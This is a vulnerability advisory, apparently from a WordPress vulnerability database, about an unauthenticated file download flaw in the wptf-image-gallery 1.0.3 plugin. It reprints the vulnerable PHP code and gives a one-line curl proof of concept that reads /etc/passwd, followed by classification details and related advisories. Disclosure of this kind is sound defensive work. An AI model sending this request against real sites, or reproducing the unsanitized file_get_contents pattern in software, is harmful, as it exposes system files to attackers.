wptf-image-gallery 1.0.3 – Remote File Download | CVE 2015-1000007

Description

Plugin is still affected and has been closed.

The ./wptf-image-gallery/lib-mbox/ajax_load.php code doesn't sanitize user input or check that a user is authorized to download files. This allows an unauthenticated user to download sensitive system files:

1 <?php
2 error_reporting(0);
3 $homepage = file_get_contents($_GET['url']);
4 $homepage = str_replace("script", "mboxdisablescript", $homepage);
5 $homepage = str_replace("SCRIPT", "mboxdisablescript", $homepage);
6 echo $homepage;
7 ?>

Proof of Concept

$ curl http://www.example.com/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd

Affects Plugins

wptf-image-gallery

No known fix

References

CVE

CVE-2015-1000007

Exploitdb

37751

Classification

Type

LFI

OWASP top 10

A1: Injection

CWE

CWE-22

CVSS

7.5 (high)

Miscellaneous

Submitter

Larry W. Cashdollar

Submitter twitter

_larry0

Verified

WPVDB ID

427f5bf4-4d2d-4b9a-9e30-1e3eb52d7f19

Timeline

Publicly Published

2015-07-18 (about 10 years ago)

Added

2015-07-20 (about 10 years ago)

Last Updated

2020-09-22 (about 5 years ago)

Other

Published

Title

Published

2025-02-22

Title

Search with Typesense < 2.0.9 - Authenticated (Admin+) Path Traversal

Published

2026-03-04

Title

ionCube Tester Plus < 1.4 - Unauthenticated Arbitrary File Download

Published

2014-09-17

Title

WP Content Source Control < 3.1.1 - Path Traversal

Published

2025-03-27

Title

CM Download Manager < 3.0.0 - Unauthenticated Arbitrary File Deletion

Published

2025-02-22

Title

Helloprint < 2.1.0 - Subscriber+ Arbitrary File Deletion